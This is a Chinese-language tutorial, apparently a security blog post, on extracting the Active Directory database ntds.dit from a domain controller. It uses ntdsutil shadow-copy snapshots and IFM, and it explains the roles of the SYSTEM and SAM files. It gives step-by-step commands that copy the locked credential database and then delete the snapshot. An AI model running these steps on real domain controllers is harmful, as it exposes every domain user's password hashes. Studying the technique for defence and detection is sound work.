域控安全之ntds.dit导出
在通常的情况下,即使我们拥有域管理员的权限也是无法读取域控制器的C:\Windows\NTDS\ntds.dit文件,是因为活动目录始终访问着这个文件,所以禁止读取.使用windows的本地卷影拷贝就可以获得文件的副本
什么是卷影拷贝:卷影拷贝服务(Volume Shadow Copy Service,VSS)是Microsoft在Windows XP中开始引入的服务,但到了Windows Server 2003作为一个备份服务器功能独立出来,它能让用户在没有IT专业人员协助的情况下,更轻松地恢复丢失的文件。
Ntds.dit
什么是ntds.dit
在活动目录中,所有的数据都保存在ntds.dit中,ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。而在非域环境也就是在工作组环境中,用户的密码等信息存储在SAM文件,想要破解SAM文件与Ntds.dit文件都需要拥有一个System文件。它和sam一样,是被Windows操作系统锁定的
如何利用:
在一般的情况下,系统的运维人员会利用卷影拷贝服务实验这些操作. VSS本质上属于快照技术的一种,主要用于备份和恢复(即使目标处于锁定的状态)
位置ntds.dit文件位置: `C:\Windows\NTDS\NTDS.dit`
system文件位置:`C:\Windows\System32\config\SYSTEM`
sam文件位置:`C:\Windows\System32\config\SAM`
ntds.dit一般存储域用户的信息,sam是本机的,然后system里面存放了密钥,如果sam,ntds.dit要破解就需要system
提取ntds.dit
通过ntdsutil.exe 提取 ntds.dit
ntdsutil.exe是一个位活动目录(AD)提供管理机制的命令行工具。该工具默认安装在了域控制器上面,可以在域控制器上面直接操作,也可以通过域内机器在域控制器上远程操作.
支持的系统:windows server 2003 ,windows server 2008, windows server 2012。
1.创建一个快照
ntdsutil snapshot “activate instance ntds” create quit quit
该快照包含Windows中的所有文件,且在复制时不会受到Windows锁定机制的影响,需要管理员权限去执行
可以看到这边创建了一个GUID{06a1b343-93f9-4c1b-a613-d02c23f99759}
2.加载快照
ntdsutil snapshot “mount {06a1b343-93f9-4c1b-a613-d02c23f99759}” quit quit //这个后面的就是刚创建的ID
可以看到快照已经加载到了路径: C:\$SNAP_202110151711_VOLUMEC$\
查看一下
确实存在了
3.拷贝快照
copy C:\$SNAP_202110151711_VOLUMEC$\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
ntdsutil snapshot “unmount {06a1b343-93f9-4c1b-a613-d02c23f99759}” “delete {06a1b343-93f9-4c1b-a613-d02c23f99759}” quit quit
ntdsutil snapshot “mount <ID>” “delete <ID>” quit quit
使用 ntdsutil 的 IFM卷影拷贝提取Ntds.dit文件
通过上一个命令执行来实现创建快照,加载,拷贝,最后提去出来ntds.dit 同时也可以通过创建一个IFM,在使用ntdsutil创建IFM时,需要进行生成快照、加载、将{% label info@ntds.dit 和计算机的SAM文件复制到目标文件夹中等 %}操作
1.执行创建IFM
在域控制器中执行如下命令即可(需要域管理员权限,没有的会让其弹出UAC):ntdsutil “ac i ntds” “ifm” “create full c:/test” q q
暂无评论内容